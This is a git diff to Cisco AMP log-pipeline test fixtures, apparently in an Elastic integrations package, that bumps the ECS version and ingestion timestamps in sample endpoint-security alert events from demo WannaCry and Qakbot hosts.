pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3919,7 +3919,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3951,7 +3951,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094104954Z",
+                "ingested": "2021-09-13T18:07:42.929554208Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4010,7 +4010,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4040,7 +4040,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094106806Z",
+                "ingested": "2021-09-13T18:07:42.929556094Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4093,7 +4093,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4113,7 +4113,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094108755Z",
+                "ingested": "2021-09-13T18:07:42.929558092Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -4164,7 +4164,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4184,7 +4184,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094110607Z",
+                "ingested": "2021-09-13T18:07:42.929559962Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -4239,7 +4239,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4259,7 +4259,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094112459Z",
+                "ingested": "2021-09-13T18:07:42.929561869Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json
similarity index 97%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json
index 83afe6a0131..a95a5b457b6 100644
--- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp7.ndjson.log-expected.json
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json
@@ -8,7 +8,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -28,7 +28,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.853984379Z",
+                "ingested": "2021-09-13T18:07:55.452466436Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -85,7 +85,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -115,7 +115,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.853988673Z",
+                "ingested": "2021-09-13T18:07:55.452471500Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -170,7 +170,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -200,7 +200,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.853990700Z",
+                "ingested": "2021-09-13T18:07:55.452473667Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -257,7 +257,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -289,7 +289,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.853992661Z",
+                "ingested": "2021-09-13T18:07:55.452475720Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -346,7 +346,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -378,7 +378,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.853994603Z",
+                "ingested": "2021-09-13T18:07:55.452477766Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -431,7 +431,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -451,7 +451,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.853996517Z",
+                "ingested": "2021-09-13T18:07:55.452479754Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -502,7 +502,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -522,7 +522,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.853998395Z",
+                "ingested": "2021-09-13T18:07:55.452481714Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -577,7 +577,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -597,7 +597,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854000301Z",
+                "ingested": "2021-09-13T18:07:55.452483701Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -652,7 +652,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -684,7 +684,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854002194Z",
+                "ingested": "2021-09-13T18:07:55.452485647Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -739,7 +739,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -763,7 +763,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:23.854004118Z",
+                "ingested": "2021-09-13T18:07:55.452487619Z",
